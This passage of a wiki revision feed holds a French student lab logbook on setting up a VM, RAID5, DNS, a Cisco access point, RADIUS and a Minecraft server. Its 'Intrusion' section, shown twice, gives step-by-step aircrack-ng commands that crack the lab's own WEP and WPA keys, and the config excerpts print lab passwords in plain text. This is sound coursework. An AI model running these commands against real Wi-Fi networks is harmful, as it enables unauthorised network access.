&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60270</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60270"/>
				<updated>2022-11-28T23:42:27Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Configuration du serveur RADIUS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
